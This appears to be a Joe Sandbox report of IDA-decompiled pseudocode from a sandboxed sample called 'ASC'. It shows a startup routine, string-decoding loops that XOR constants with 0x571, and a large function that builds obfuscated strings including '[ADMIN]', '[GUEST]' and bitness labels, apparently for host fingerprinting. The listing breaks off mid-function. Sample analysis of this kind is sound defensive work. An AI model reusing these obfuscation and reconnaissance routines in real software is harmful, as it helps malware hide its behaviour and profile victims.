Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd

Function 012C23B5, Relevance: 1.6, APIs: 1, Instructions: 54

C-Code - Quality: 19%

			E012C23B5(void* __edi, void* __esi, intOrPtr _a4) {
				void* _t3;
				intOrPtr* _t9;
				void* _t14;
				void* _t19;
				intOrPtr* _t20;
				void* _t22;

				_t22 = __esi;
				_t19 = __edi;
				_t25 =  *0x12e08d4;
				if( *0x12e08d4 != 0 && E012C8900(_t25, 0x12e08d4) != 0) {
					 *0x12e08d4(_a4);
				}
				E012C883E(_t19, _t22);
				_t3 = E012C2391(0x12dc2f4, 0x12dc30c); // executed
				_pop(_t14);
				_t27 = _t3;
				if(_t3 == 0) {
					_push(_t22);
					_push(_t19);
					E012C8827(_t14, _t27, E012C802D); // executed
					_t20 = 0x12dc2e4;
					if(0x12dc2e4 >= 0x12dc2f0) {
						L8:
						_t31 =  *0x12e6b30;
						if( *0x12e6b30 != 0 && E012C8900(_t31, 0x12e6b30) != 0) {
							 *0x12e6b30(0, 2, 0);
						}
						return 0;
					} else {
						goto L5;
					}
					do {
						L5:
						_t9 =  *_t20;
						if(_t9 != 0) {
							 *_t9();
						}
						_t20 = _t20 + 4;
					} while (_t20 < 0x12dc2f0);
					goto L8;
				}
				return _t3;
			}

0x012c23b5
0x012c23b5
0x012c23ba
0x012c23c1
0x012c23d5
0x012c23db
0x012c23dc
0x012c23eb
0x012c23f1
0x012c23f2
0x012c23f4
0x012c23f6
0x012c23f7
0x012c23fd
0x012c240d
0x012c2411
0x012c2422
0x012c2422
0x012c242b
0x012c2442
0x012c2442
0x00000000
0x00000000
0x00000000
0x00000000
0x012c2413
0x012c2413
0x012c2413
0x012c2417
0x012c2419
0x012c2419
0x012c241b
0x012c241e
0x00000000
0x012c2413
0x012c244b

APIs

__initterm_e.LIBCMT ref: 012C23EB

Part of subcall function 012C8900: __FindPESection.LIBCMT ref: 012C895B

Memory Dump Source

Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd

Function 012D1AB7, Relevance: 1.6, APIs: 1, Instructions: 52
thread

C-Code - Quality: 57%

			E012D1AB7(signed int __ebx, void* __edx, void* __edi, void* __ebp, char _a2, short _a4, short _a6, short _a8, short _a10, short _a12, short _a14, short _a16, signed int _a18, char _a104, char _a120) {
				void* _t24;
				void* _t27;
				intOrPtr* _t33;
				signed int _t35;
				void* _t46;
				intOrPtr* _t47;
				void* _t49;
				void* _t51;

				_t46 = __edi;
				_t45 = __edx;
				_t35 = __ebx;
				_pop(_t47);
				E013514C3(_t24, __edx, _t47);
				while(1) {
					_t27 =  *_t47( &_a120, _t35, _t35, _t35);
					if(_t27 == _t35) {
						break;
					}
					if(_t27 == 0xffffffff) {
						continue;
					}
					_push( &_a104);
					return E0132410C( &_a104, _t45);
				}
				_t51 =  *0x12e59a4 - _t35; // 0x0
				if(_t51 != 0) {
					_t33 =  *0x12e4f14; // 0x0
					_push(_t35);
					 *_t33 = 1;
					RtlExitUserThread();
				}
				_a16 = 0x571;
				_a14 = 0x540;
				_a12 = 0x52b;
				_a10 = 0x522;
				_a8 = 0x534;
				_a6 = 0x536;
				_a4 = 0x529;
				_a2 = 0x535;
				_a18 = _t35;
				do {
					 *(_t49 + 0xe + _t35 * 2) =  *(_t49 + 0xe + _t35 * 2) ^ 0x00000571;
					_t35 = _t35 + 1;
				} while (_t35 < 8);
				_push(_a8);
				_push( &_a2);
				_a18 = 1;
				return E01348084( &_a2, 0x571, _t46);
			}

0x012d1ab7
0x012d1ab7
0x012d1ab7
0x012d1ab7
0x012d1ab8
0x012d1ada
0x012d1ae5
0x012d1ae9
0x00000000
0x00000000
0x012d1ac2
0x00000000
0x00000000
0x012d1ac8
0x00000000
0x012d1ac9
0x012d1aeb
0x012d1af1
0x012d1af3
0x012d1af8
0x012d1af9
0x012d1aff
0x012d1aff
0x012d1b0c
0x012d1b14
0x012d1b1c
0x012d1b24
0x012d1b2c
0x012d1b34
0x012d1b3c
0x012d1b44
0x012d1b49
0x012d1b4d
0x012d1b4f
0x012d1b54
0x012d1b55
0x012d1b5a
0x012d1b61
0x012d1b62
0x00000000

APIs

RtlExitUserThread.NTDLL(?,?,?,?,?,?), ref: 012D1AFF

Memory Dump Source

Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd

Function 012D1ACF, Relevance: 1.5, APIs: 1, Instructions: 47
thread

C-Code - Quality: 56%

			E012D1ACF(signed int __ebx, void* __edx, void* __edi, intOrPtr* __esi) {
				void* _t26;
				intOrPtr* _t31;
				signed int _t35;
				void* _t45;
				intOrPtr* _t47;
				void* _t48;
				void* _t49;

				_t47 = __esi;
				_t46 = __edi;
				_t45 = __edx;
				_t35 = __ebx;
				_push(_t49 + 0x74);
				_push(__edi); // executed
				_t26 = E01337B08(_t49 + 0x74, __ebx); // executed
				while(1) {
					_t26 =  *_t47(_t49 + 0x80, _t35, _t35, _t35);
					__eflags = _t26 - _t35;
					if(_t26 == _t35) {
						break;
					}
					if(_t26 == 0xffffffff) {
						continue;
					}
					_push(_t49 + 0x74);
					return E0132410C(_t49 + 0x74, _t45);
				}
				__eflags =  *0x12e59a4 - _t35; // 0x0
				if(__eflags != 0) {
					_t31 =  *0x12e4f14; // 0x0
					_push(_t35);
					 *_t31 = 1;
					RtlExitUserThread();
				}
				 *((short*)(_t49 + 0x1c)) = 0x571;
				 *((short*)(_t49 + 0x1a)) = 0x540;
				 *((short*)(_t49 + 0x18)) = 0x52b;
				 *((short*)(_t49 + 0x16)) = 0x522;
				 *((short*)(_t49 + 0x14)) = 0x534;
				 *((short*)(_t49 + 0x12)) = 0x536;
				 *((short*)(_t49 + 0x10)) = 0x529;
				__eflags = 0x535;
				 *((short*)(_t49 + 0xe)) = 0x535;
				 *(_t49 + 0x1e) = _t35;
				do {
					 *(_t49 + 0xe + _t35 * 2) =  *(_t49 + 0xe + _t35 * 2) ^ 0x00000571;
					_t35 = _t35 + 1;
					__eflags = _t35 - 8;
				} while (_t35 < 8);
				_push( *((intOrPtr*)(_t48 + 8)));
				_push(_t49 + 0x12);
				 *((char*)(_t49 + 0x26)) = 1;
				return E01348084(_t49 + 0x12, 0x571, _t46);
			}

0x012d1acf
0x012d1acf
0x012d1acf
0x012d1acf
0x012d1ad3
0x012d1ad4
0x012d1ad5
0x012d1ada
0x012d1ae5
0x012d1ae7
0x012d1ae9
0x00000000
0x00000000
0x012d1ac2
0x00000000
0x00000000
0x012d1ac8
0x00000000
0x012d1ac9
0x012d1aeb
0x012d1af1
0x012d1af3
0x012d1af8
0x012d1af9
0x012d1aff
0x012d1aff
0x012d1b0c
0x012d1b14
0x012d1b1c
0x012d1b24
0x012d1b2c
0x012d1b34
0x012d1b3c
0x012d1b41
0x012d1b44
0x012d1b49
0x012d1b4d
0x012d1b4f
0x012d1b54
0x012d1b55
0x012d1b55
0x012d1b5a
0x012d1b61
0x012d1b62
0x00000000

APIs

RtlExitUserThread.NTDLL(?,?,?,?,?,?), ref: 012D1AFF

Memory Dump Source

Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd

Function 012D1F30, Relevance: 1.5, APIs: 1, Instructions: 23

C-Code - Quality: 100%

			E012D1F30(void* __eax, void* __edi, intOrPtr _a4, intOrPtr _a8) {
				void* _t7;
				char _t9;
				void* _t10;
				void* _t11;
				void* _t15;

				_t10 = __edi;
				_t11 = __eax - 1;
				_t9 = 0;
				_t7 = E012C1AE5(__edi, _t11, _a4, _a8); // executed
				if(_t7 < 0) {
					L4:
					 *((char*)(_t11 + _t10)) = _t9;
					_t9 = 0x8007007a;
					L5:
					return _t9;
				}
				_t15 = _t7 - _t11;
				if(_t15 > 0) {
					goto L4;
				}
				if(_t15 == 0) {
					 *((char*)(_t11 + __edi)) = 0;
				}
				goto L5;
			}

0x012d1f30
0x012d1f36
0x012d1f3d
0x012d1f41
0x012d1f4b
0x012d1f58
0x012d1f58
0x012d1f5b
0x012d1f61
0x012d1f64
0x012d1f64
0x012d1f4d
0x012d1f4f
0x00000000
0x00000000
0x012d1f51
0x012d1f53
0x012d1f53
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 012D1F41

Memory Dump Source

Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd

Function 012CD219, Relevance: 1.5, APIs: 1, Instructions: 10library

APIs

GetProcAddress.KERNEL32 ref: 012CD21A

Memory Dump Source

Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd

Function 012C8FD6, Relevance: 1.3, APIs: 1, Instructions: 30
sleep

C-Code - Quality: 100%

			E012C8FD6(intOrPtr _a4, intOrPtr _a8) {
				void* _t4;
				long _t6;
				void* _t7;
				long _t8;
				void* _t9;
				void* _t12;
				void* _t13;

				_t8 = 0;
				while(1) {
					_t4 = E012CB2AC(_a4, _a8, 0); // executed
					_t7 = _t4;
					_t9 = _t9 + 0xc;
					if(_t7 != 0) {
						break;
					}
					_t12 =  *0x12e3b84 - _t4; // 0x0
					if(_t12 > 0) {
						Sleep(_t8);
						_t3 = _t8 + 0x3e8; // 0x3e8
						_t6 = _t3;
						_t13 = _t6 -  *0x12e3b84; // 0x0
						if(_t13 > 0) {
							_t6 = _t6 | 0xffffffff;
						}
						_t8 = _t6;
						if(_t6 != 0xffffffff) {
							continue;
						}
					}
					break;
				}
				return _t7;
			}

0x012c8fdd
0x012c8fdf
0x012c8fe7
0x012c8fec
0x012c8fee
0x012c8ff3
0x00000000
0x00000000
0x012c8ff5
0x012c8ffb
0x012c8ffe
0x012c9004
0x012c9004
0x012c900a
0x012c9010
0x012c9012
0x012c9012
0x012c9015
0x012c901a
0x00000000
0x00000000
0x012c901a
0x00000000
0x012c8ffb
0x012c9021

APIs

Sleep.KERNEL32(00000000), ref: 012C8FFE

Memory Dump Source

Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd

Function 012CD184, Relevance: 1.3, APIs: 1, Instructions: 17

C-Code - Quality: 20%

			E012CD184() {
				intOrPtr _v16;
				void* _t3;
				void* _t6;
				void* _t8;

				_push(0);
				_push(0);
				_push(1);
				_push(0);
				_t3 = E01332812(0, _t6);
				_push(_v16);
				_t8 = _t3;
				_push(_t8);
				_push(_t3); // executed
				E013845E0(); // executed
				return CloseHandle(_t8);
			}

0x012cd187
0x012cd188
0x012cd189
0x012cd18b
0x012cd18d
0x012cd192
0x012cd196
0x012cd198
0x012cd199
0x012cd19a
0x012cd1a7

APIs

CloseHandle.KERNEL32(00000000), ref: 012CD1A0

Memory Dump Source

Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd

Function 0141CA42, Relevance: 1.3, APIs: 1, Instructions: 6

APIs

LocalAlloc.KERNELBASE ref: 0141CA46

Memory Dump Source

Source File: 00000005.00000001.13484397461.0000000001388000.00000020.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000005.00000001.13484384581.00000000012C0000.00000002.sdmp
Associated: 00000005.00000001.13484628530.000000000143B000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_12c0000_ASC.jbxd

Non-executed Functions

Function 0142FE67, Relevance: 2.9, Strings: 2, Instructions: 412

Strings

;<, xrefs: 014301C1
=<=, xrefs: 01430066

Memory Dump Source

Source File: 00000005.00000001.13484397461.0000000001388000.00000020.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000005.00000001.13484384581.00000000012C0000.00000002.sdmp
Associated: 00000005.00000001.13484628530.000000000143B000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_12c0000_ASC.jbxd

Function 012D41C3, Relevance: 2.4, APIs: 1, Instructions: 898
libraryCrypto

C-Code - Quality: 80%

			E012D41C3(struct HINSTANCE__* __eax, signed short* __edx, void* __edi) {
				void* __esi;
				_Unknown_base(*)()* _t493;
				void* _t499;
				char* _t501;
				void* _t502;
				signed short _t504;
				short _t505;
				short _t506;
				short _t507;
				short _t508;
				short _t509;
				short _t510;
				short _t511;
				signed short* _t520;
				signed short* _t521;
				signed short _t522;
				signed short* _t523;
				signed short* _t524;
				intOrPtr _t525;
				void* _t532;
				intOrPtr* _t535;
				void* _t538;
				intOrPtr* _t540;
				intOrPtr* _t541;
				signed short* _t545;
				signed short* _t548;
				signed short* _t551;
				signed short* _t554;
				signed short* _t773;
				void* _t780;
				void* _t782;
				void* _t783;
				short _t785;
				short _t786;
				short _t787;
				short _t788;
				short _t789;
				short _t790;
				short _t791;
				short _t794;
				short _t795;
				short _t796;
				short _t797;
				short _t798;
				short _t799;
				short _t800;
				short _t803;
				short _t804;
				short _t805;
				short _t806;
				short _t807;
				short _t808;
				short _t809;
				signed int _t821;
				signed short* _t822;
				intOrPtr _t823;
				intOrPtr* _t826;
				signed int _t828;
				void* _t830;
				void* _t831;
				signed short _t833;
				signed short _t834;
				signed int _t838;
				signed short* _t839;
				signed int _t849;
				signed int _t850;
				void* _t851;
				void* _t852;
				signed short _t853;
				signed short* _t854;
				void* _t855;
				signed short* _t856;
				signed short* _t879;
				intOrPtr* _t880;
				intOrPtr _t881;
				void* _t883;
				signed short* _t884;
				signed short* _t886;
				signed short* _t888;
				void* _t889;

				_t855 = __edi;
				_t839 = __edx;
				_t493 = GetProcAddress(__eax, ??);
				_push(0);
				_push(_t889 - 0x478);
				_t776 = _t889 - 0x480;
				_push(_t889 - 0x480);
				_push(_t883);
				if( *_t493() == 0) {
					 *(__edi + 0x55c) = 0;
					 *(__edi + 0x558) = 0;
				} else {
					 *(__edi + 0x558) = ( *(_t889 - 0x474) << 0x00000020 |  *(_t889 - 0x478)) >> 0x14;
					_t838 =  *(_t889 - 0x47c);
					_t776 = _t838 >> 0x14;
					 *(__edi + 0x55c) = (_t838 << 0x00000020 |  *(_t889 - 0x480)) >> 0x14;
				}
				E012C115B(_t776, _t839, _t883, _t883);
				_t856 = E012CD461(0, _t855, _t883, 0);
				_push(_t889 - 0x90);
				_t884 = _t889 - 0x46c;
				 *(_t889 - 0x9c) = _t856;
				 *(_t889 - 0x18) = 0;
				E012CD1A8();
				if( *(_t889 - 0x46c) != 0) {
					 *(_t889 - 0x18) = E012CD461(0, _t856, _t884, 1);
				}
				if(_t856 == 0) {
					_t780 = 0;
				} else {
					_t554 = _t856;
					_t25 =  &(_t554[1]); // 0x2
					_t839 = _t25;
					do {
						_t834 =  *_t554;
						_t554 =  &(_t554[1]);
					} while (_t834 != 0);
					_t780 = (_t554 - _t839 >> 1) + (_t554 - _t839 >> 1);
				}
				if( *(_t889 - 0x18) == 0) {
					_t499 = 0;
				} else {
					_t551 =  *(_t889 - 0x18);
					_t884 =  &(_t551[1]);
					do {
						_t839 =  *_t551;
						_t551 =  &(_t551[1]);
					} while (_t839 != 0);
					_t499 = (_t551 - _t884 >> 1) + (_t551 - _t884 >> 1);
				}
				_t501 = E012C1195(_t839, _t856, _t884, _t499 + _t780 + 0x960);
				 *((intOrPtr*)(_t889 - 0x470)) = _t501;
				_t782 = 0x400;
				do {
					 *_t501 = 0;
					_t501 = _t501 + 1;
					_t782 = _t782 - 1;
				} while (_t782 != 0);
				if(_t856 == 0) {
					_t783 = 0;
				} else {
					_t548 = _t856;
					_t33 =  &(_t548[1]); // 0x2
					_t854 = _t33;
					do {
						_t833 =  *_t548;
						_t548 =  &(_t548[1]);
					} while (_t833 != 0);
					_t783 = (_t548 - _t854 >> 1) + (_t548 - _t854 >> 1);
				}
				if( *(_t889 - 0x18) == 0) {
					_t502 = 0;
				} else {
					_t545 =  *(_t889 - 0x18);
					_t888 =  &(_t545[1]);
					do {
						_t853 =  *_t545;
						_t545 =  &(_t545[1]);
					} while (_t853 != 0);
					_t502 = (_t545 - _t888 >> 1) + (_t545 - _t888 >> 1);
				}
				 *((intOrPtr*)(_t889 - 0x464)) = _t502 + _t783 + 0x960;
				_t504 = 0x20;
				 *((short*)(_t889 - 0xbc)) = _t504;
				_t785 = 0x28;
				 *((short*)(_t889 - 0xba)) = _t785;
				_t786 = 0x36;
				 *((short*)(_t889 - 0xb8)) = _t786;
				_t787 = 0x34;
				 *((short*)(_t889 - 0xb6)) = _t787;
				_t788 = 0x62;
				 *((short*)(_t889 - 0xb4)) = _t788;
				_t789 = 0x69;
				 *((short*)(_t889 - 0xb2)) = _t789;
				_t790 = 0x74;
				 *((short*)(_t889 - 0xb0)) = _t790;
				_t791 = 0x29;
				 *((short*)(_t889 - 0xae)) = _t791;
				 *((short*)(_t889 - 0xac)) = 0;
				 *((short*)(_t889 - 0xd0)) = _t504;
				_t794 = 0x28;
				 *((short*)(_t889 - 0xce)) = _t794;
				_t795 = 0x33;
				 *((short*)(_t889 - 0xcc)) = _t795;
				_t796 = 0x32;
				 *((short*)(_t889 - 0xca)) = _t796;
				_t797 = 0x62;
				 *((short*)(_t889 - 0xc8)) = _t797;
				_t798 = 0x69;
				 *((short*)(_t889 - 0xc6)) = _t798;
				_t799 = 0x74;
				 *((short*)(_t889 - 0xc4)) = _t799;
				_t800 = 0x29;
				 *((short*)(_t889 - 0xc2)) = _t800;
				 *((short*)(_t889 - 0xc0)) = 0;
				 *(_t889 - 0x128) = _t504;
				_t803 = 0x5b;
				 *((short*)(_t889 - 0x126)) = _t803;
				_t804 = 0x47;
				 *((short*)(_t889 - 0x124)) = _t804;
				_t805 = 0x55;
				 *((short*)(_t889 - 0x122)) = _t805;
				_t806 = 0x45;
				 *((short*)(_t889 - 0x120)) = _t806;
				_t807 = 0x53;
				 *((short*)(_t889 - 0x11e)) = _t807;
				_t808 = 0x54;
				 *((short*)(_t889 - 0x11c)) = _t808;
				_t809 = 0x5d;
				 *((short*)(_t889 - 0x11a)) = _t809;
				 *((short*)(_t889 - 0x118)) = 0;
				 *(_t889 - 0x114) = _t504;
				_t505 = 0x5b;
				 *((short*)(_t889 - 0x112)) = _t505;
				_t506 = 0x41;
				 *((short*)(_t889 - 0x110)) = _t506;
				_t507 = 0x44;
				 *((short*)(_t889 - 0x10e)) = _t507;
				_t508 = 0x4d;
				 *((short*)(_t889 - 0x10c)) = _t508;
				_t509 = 0x49;
				 *((short*)(_t889 - 0x10a)) = _t509;
				_t510 = 0x4e;
				 *((short*)(_t889 - 0x108)) = _t510;
				_t511 = 0x5d;
				 *((short*)(_t889 - 0x106)) = _t511;
				 *((short*)(_t889 - 0x104)) = 0;
				 *((short*)(_t889 - 0xf2)) = 0xdb;
				 *((short*)(_t889 - 0xf4)) = 0xdb;
				 *((short*)(_t889 - 0xf6)) = 0x8c;
				 *((short*)(_t889 - 0xf8)) = 0x94;
				 *((short*)(_t889 - 0xfa)) = 0xdb;
				 *((short*)(_t889 - 0xfc)) = 0x90;
				 *((short*)(_t889 - 0xfe)) = 0xdb;
				 *((short*)(_t889 - 0x100)) = 0x8e;
				 *((short*)(_t889 - 0x258)) = 0xe6;
				 *((short*)(_t889 - 0x25a)) = 0xdb;
				 *((short*)(_t889 - 0x25c)) = 0xc3;
				 *((short*)(_t889 - 0x25e)) = 0xec;
				 *((short*)(_t889 - 0x260)) = 0xdc;
				 *((short*)(_t889 - 0x262)) = 0xcf;
				 *((short*)(_t889 - 0x264)) = 0xd2;
				 *((short*)(_t889 - 0x266)) = 0xd0;
				 *((short*)(_t889 - 0x268)) = 0x9e;
				 *((short*)(_t889 - 0x26a)) = 0xce;
				 *((short*)(_t889 - 0x26c)) = 0xc6;
				 *((short*)(_t889 - 0x26e)) = 0x92;
				 *((char*)(_t889 - 0xf0)) = 0;
				 *((short*)(_t889 - 0x270)) = 0xdb;
				 *((short*)(_t889 - 0x272)) = 0x8f;
				 *((short*)(_t889 - 0x274)) = 0xaa;
				 *((short*)(_t889 - 0x276)) = 0x88;
				 *((short*)(_t889 - 0x278)) = 0x89;
				 *((short*)(_t889 - 0x27a)) = 0x8f;
				 *((short*)(_t889 - 0x27c)) = 0x92;
				 *((short*)(_t889 - 0x27e)) = 0x87;
				 *((short*)(_t889 - 0x280)) = 0x85;
				 *((short*)(_t889 - 0x282)) = 0x8f;
				 *((short*)(_t889 - 0x284)) = 0x8a;
				 *((short*)(_t889 - 0x286)) = 0x96;
				 *((short*)(_t889 - 0x288)) = 0x96;
				 *((short*)(_t889 - 0x28a)) = 0xa7;
				 *((short*)(_t889 - 0x28c)) = 0xec;
				 *((short*)(_t889 - 0x28e)) = 0xdb;
				 *((short*)(_t889 - 0x290)) = 0xc3;
				 *((short*)(_t889 - 0x292)) = 0xec;
				 *((short*)(_t889 - 0x294)) = 0xdc;
				 *((short*)(_t889 - 0x296)) = 0xcf;
				 *((short*)(_t889 - 0x298)) = 0xd0;
				 *((short*)(_t889 - 0x29a)) = 0xde;
				 *((short*)(_t889 - 0x29c)) = 0x9e;
				 *((short*)(_t889 - 0x29e)) = 0xce;
				 *((short*)(_t889 - 0x2a0)) = 0xc6;
				 *((short*)(_t889 - 0x2a2)) = 0x92;
				 *((short*)(_t889 - 0x2a4)) = 0xdb;
				 *((short*)(_t889 - 0x2a6)) = 0x8f;
				 *((short*)(_t889 - 0x2a8)) = 0xaa;
				 *((short*)(_t889 - 0x2aa)) = 0xc6;
				 *((short*)(_t889 - 0x2ac)) = 0x88;
				 *((short*)(_t889 - 0x2ae)) = 0x89;
				 *((short*)(_t889 - 0x2b0)) = 0x8f;
				 *((short*)(_t889 - 0x2ba)) = 0x8a;
				 *((short*)(_t889 - 0x2b2)) = 0x92;
				 *((short*)(_t889 - 0x2be)) = 0x96;
				 *((short*)(_t889 - 0x2b4)) = 0x87;
				 *((short*)(_t889 - 0x2c0)) = 0xa7;
				 *((short*)(_t889 - 0x2c2)) = 0xec;
				 *((short*)(_t889 - 0x2c4)) = 0xdb;
				 *((short*)(_t889 - 0x2c6)) = 0xc3;
				 *((short*)(_t889 - 0x2c8)) = 0xc6;
				 *((short*)(_t889 - 0x2ca)) = 0xdc;
				 *((short*)(_t889 - 0x2cc)) = 0xa2;
				 *((short*)(_t889 - 0x2bc)) = 0x96;
				 *((short*)(_t889 - 0x2ce)) = 0xaf;
				 *((intOrPtr*)(_t889 - 0x2b8)) = 0x85008f;
				 *((short*)(_t889 - 0x2d0)) = 0xb5;
				 *((short*)(_t889 - 0x2d2)) = 0xec;
				 *((short*)(_t889 - 0x2d4)) = 0xdb;
				 *((short*)(_t889 - 0x2d6)) = 0xc3;
				 *((short*)(_t889 - 0x2d8)) = 0xdb;
				 *((short*)(_t889 - 0x2da)) = 0xc3;
				 *((short*)(_t889 - 0x2dc)) = 0xdb;
				 *((short*)(_t889 - 0x2de)) = 0xc3;
				 *((short*)(_t889 - 0x2e0)) = 0xdb;
				 *((short*)(_t889 - 0x2e2)) = 0xc3;
				 *((short*)(_t889 - 0x2e4)) = 0xdb;
				 *((short*)(_t889 - 0x2e6)) = 0xc3;
				 *((short*)(_t889 - 0x2e8)) = 0xc6;
				 *((short*)(_t889 - 0x2ea)) = 0xdc;
				 *((short*)(_t889 - 0x2ec)) = 0x89;
				 *((short*)(_t889 - 0x2f4)) = 0xc6;
				 *((short*)(_t889 - 0x2ee)) = 0x80;
				 *((short*)(_t889 - 0x2f6)) = 0x94;
				 *((short*)(_t889 - 0x2f8)) = 0x83;
				 *((short*)(_t889 - 0x2fa)) = 0xdb;
				 *((short*)(_t889 - 0x2fc)) = 0xb3;
				 *((short*)(_t889 - 0x2fe)) = 0xec;
				 *((short*)(_t889 - 0x300)) = 0xec;
				 *((short*)(_t889 - 0x302)) = 0xcf;
				 *((short*)(_t889 - 0x304)) = 0xdb;
				 *((short*)(_t889 - 0x306)) = 0xc3;
				 *((short*)(_t889 - 0x308)) = 0xce;
				 *((short*)(_t889 - 0x30a)) = 0xc6;
				 *((short*)(_t889 - 0x30c)) = 0xdb;
				 *((short*)(_t889 - 0x30e)) = 0xc3;
				 *((short*)(_t889 - 0x310)) = 0xb9;
				 *((short*)(_t889 - 0x312)) = 0xdb;
				 *((short*)(_t889 - 0x314)) = 0xc3;
				 *((short*)(_t889 - 0x316)) = 0xc6;
				 *((short*)(_t889 - 0x318)) = 0xdc;
				 *((short*)(_t889 - 0x31a)) = 0x83;
				 *((short*)(_t889 - 0x31c)) = 0x8a;
				 *((short*)(_t889 - 0x31e)) = 0x87;
				 *((short*)(_t889 - 0x320)) = 0x85;
				 *((short*)(_t889 - 0x322)) = 0x89;
				 *((intOrPtr*)(_t889 - 0x2f2)) = 0x8800af;
				 *((short*)(_t889 - 0x324)) = 0xaa;
				 *((short*)(_t889 - 0x326)) = 0xec;
				 *((short*)(_t889 - 0x328)) = 0x9b;
				 *((short*)(_t889 - 0x32a)) = 0xdb;
				 *((short*)(_t889 - 0x32c)) = 0xc3;
				 *((short*)(_t889 - 0x32e)) = 0x9d;
				 *((short*)(_t889 - 0x330)) = 0xc6;
				 *((short*)(_t889 - 0x332)) = 0xdb;
				 *((short*)(_t889 - 0x334)) = 0xc3;
				 *((short*)(_t889 - 0x336)) = 0xdb;
				 *((short*)(_t889 - 0x338)) = 0xc3;
				 *((short*)(_t889 - 0x33a)) = 0xdb;
				 *((short*)(_t889 - 0x33c)) = 0xc3;
				 *((short*)(_t889 - 0x33e)) = 0xdb;
				 *((short*)(_t889 - 0x340)) = 0xc3;
				 *((short*)(_t889 - 0x342)) = 0xc6;
				 *((short*)(_t889 - 0x344)) = 0xdc;
				 *((short*)(_t889 - 0x346)) = 0x89;
				 *((short*)(_t889 - 0x348)) = 0x92;
				 *((short*)(_t889 - 0x34a)) = 0xc6;
				 *((short*)(_t889 - 0x34c)) = 0x82;
				 *((short*)(_t889 - 0x34e)) = 0x83;
				 *((short*)(_t889 - 0x350)) = 0x94;
				 *((short*)(_t889 - 0x352)) = 0x83;
				 *((short*)(_t889 - 0x354)) = 0x92;
				 *((short*)(_t889 - 0x356)) = 0xdb;
				 *((short*)(_t889 - 0x358)) = 0x8f;
				 *((short*)(_t889 - 0x35a)) = 0x81;
				 *((short*)(_t889 - 0x35c)) = 0x83;
				 *((short*)(_t889 - 0x35e)) = 0xb4;
				 *((short*)(_t889 - 0x360)) = 0xec;
				 *((short*)(_t889 - 0x362)) = 0xdb;
				 *((short*)(_t889 - 0x364)) = 0xc3;
